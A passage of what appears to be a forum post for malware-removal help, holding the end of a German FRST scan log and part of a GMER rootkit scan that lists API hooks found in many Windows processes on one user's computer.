- 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt 2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt 2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt 2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt 2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt 2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt 2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt 2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt 2014-07-12 11:11 - 2014-07-12 12:12 - 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt 2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt 2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt 2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt 2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt 2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt 2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt 2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt 2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt 2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt 2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt 2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt 2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt 2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt 2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt 2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt 2014-08-01 13:28 - 2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt 2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () C:\ProgramData\RUNDLL32.EXE-3500-F.txt 2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt 2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt 2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt 2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () C:\ProgramData\RUNDLL32.EXE-3548-F.txt 2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt 2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt 2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt 2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt 2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt 2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt 2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt 2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt 2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt 2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt 2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt 2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt 2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt 2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt 2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt 2014-07-30 09:31 - 2014-07-30 09:50 - 0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt 2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt 2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt 2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt 2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt 2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () C:\ProgramData\RUNDLL32.EXE-4212-F.txt 2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt 2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt 2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt 2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt 2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt 2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt 2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt 2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt 2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt 2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt 2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt 2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt 2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt 2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt 2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt 2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () C:\ProgramData\RUNDLL32.EXE-4780-F.txt 2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt 2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt 2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt 2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt 2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () C:\ProgramData\RUNDLL32.EXE-5048-F.txt 2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt 2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt 2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt 2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt 2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt 2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt 2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt Einige Dateien in TEMP: ==================== C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x64.dll C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x86.dll C:\Users\Kenny G\AppData\Local\Temp\newversion.exe C:\Users\Kenny G\AppData\Local\Temp\ose00000.exe C:\Users\Kenny G\AppData\Local\Temp\ose00002.exe C:\Users\Kenny G\AppData\Local\Temp\ose00003.exe C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-win32.dll C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-x64.dll C:\Users\Kenny G\AppData\Local\Temp\sqlite3.dll C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\Windows\system32\winlogon.exe => Datei ist digital signiert C:\Windows\system32\wininit.exe => Datei ist digital signiert C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert C:\Windows\explorer.exe => Datei ist digital signiert C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert C:\Windows\system32\svchost.exe => Datei ist digital signiert C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert C:\Windows\system32\services.exe => Datei ist digital signiert C:\Windows\system32\User32.dll => Datei ist digital signiert C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert C:\Windows\system32\userinit.exe => Datei ist digital signiert C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert C:\Windows\system32\rpcss.dll => Datei ist digital signiert C:\Windows\system32\dnsapi.dll => Datei ist digital signiert C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2015-09-13 22:19 ==================== Ende von FRST.txt ============================ gmer Code:
ATTFilter GMER 2.1.19357 - hxxp://www.gmer.net Rootkit scan 2015-09-20 19:29:17 Windows 6.1.7600 x64 \Device\Harddisk0\DR0 -> \Device\00000065 SAMSUNG_ rev.KF10 186,31GB Running: Gmer-19357.exe; Driver: C:\Users\KENNYG~1\AppData\Local\Temp\fwdiipog.sys ---- Kernel code sections - GMER 2.1 ---- INITKDBG C:\Windows\system32\ntoskrnl.exe suspicious modification ---- User code sections - GMER 2.1 ---- .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe[2580] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recv + 82 00000000726417fa 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!recvfrom + 88 0000000072641860 2 bytes CALL 74fc1199 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 98 0000000072641942 2 bytes JMP 751ec29f C:\Windows\syswow64\WS2_32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\SysWOW64\WSOCK32.dll!setsockopt + 109 000000007264194d 2 bytes JMP 751e418d C:\Windows\syswow64\WS2_32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExW + 17 00000000750b1401 2 bytes JMP 74fdeb26 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcessModules + 17 00000000750b1419 2 bytes JMP 74feb513 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 17 00000000750b1431 2 bytes JMP 75068609 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleInformation + 42 00000000750b144a 2 bytes CALL 74fc1dfa C:\Windows\syswow64\kernel32.dll .text ... * 9 .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumDeviceDrivers + 17 00000000750b14dd 2 bytes JMP 75067efe C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameA + 17 00000000750b14f5 2 bytes JMP 750680d8 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSetEx + 17 00000000750b150d 2 bytes JMP 75067df4 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetDeviceDriverBaseNameW + 17 00000000750b1525 2 bytes JMP 750681c2 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameW + 17 00000000750b153d 2 bytes JMP 74fdf088 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!EnumProcesses + 17 00000000750b1555 2 bytes JMP 74feb885 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessMemoryInfo + 17 00000000750b156d 2 bytes JMP 750686c1 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetPerformanceInfo + 17 00000000750b1585 2 bytes JMP 75068222 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!QueryWorkingSet + 17 00000000750b159d 2 bytes JMP 75067db8 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleBaseNameA + 17 00000000750b15b5 2 bytes JMP 74fdf121 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetModuleFileNameExA + 17 00000000750b15cd 2 bytes JMP 74feb29f C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 20 00000000750b16b2 2 bytes JMP 75068584 C:\Windows\syswow64\kernel32.dll .text C:\Windows\SysWOW64\PnkBstrA.exe[2616] C:\Windows\syswow64\PSAPI.DLL!GetProcessImageFileNameW + 31 00000000750b16bd 2 bytes JMP 75067d4d C:\Windows\syswow64\kernel32.dll .text C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 0000000177100128 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 0000000177100018 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000771000a0 .text C:\Windows\system32\svchost.exe[2708] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs[2748] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\taskhost.exe[3408] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe[3500] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\Dwm.exe[3556] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\conhost.exe[3564] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\Explorer.EXE[3616] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\Explorer.EXE[3616] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\Explorer.EXE[3616] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\SearchIndexer.exe[3828] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe[2236] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Program Files (x86)\AVG\AVG2015\avgui.exe[3272] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtMapViewOfSection 000000007730fbf0 5 bytes JMP 000000016fbc19d0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory 000000007730fdb4 1 byte JMP 000000016fbc15f0 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\SysWOW64\ntdll.dll!NtWriteVirtualMemory + 2 000000007730fdb6 3 bytes {JMP 0xfffffffff88b183c} .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\kernel32.dll!CreateProcessInternalW 0000000074fd117b 5 bytes JMP 000000016fbc1760 .text C:\Windows\SysWOW64\ctfmon.exe[2968] C:\Windows\syswow64\KERNELBASE.dll!ResumeThread 00000000750d2bbe 5 bytes JMP 000000016fbc1bb0 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe[2916] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 00000000772c0128 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 00000000772c0018 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Program Files\NVIDIA Corporation\Display\nvtray.exe[3788] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 bytes JMP 0000000177100128 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\SYSTEM32\ntdll.dll!NtWriteVirtualMemory 0000000077160250 5 bytes JMP 0000000177100018 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000771000a0 .text C:\Windows\System32\svchost.exe[3964] C:\Windows\system32\KERNELBASE.dll!ResumeThread 000007fefc0c7ca0 5 bytes JMP 000007fff67d1cc0 .text C:\Program Files\Windows Media Player\wmpnetwk.exe[3240] C:\Windows\system32\kernel32.dll!CreateProcessInternalW 0000000076f0a600 5 bytes JMP 00000000772c00a0 .text C:\Windows\system32\wuauclt.exe[4160] C:\Windows\SYSTEM32\ntdll.dll!NtMapViewOfSection 0000000077160130 5 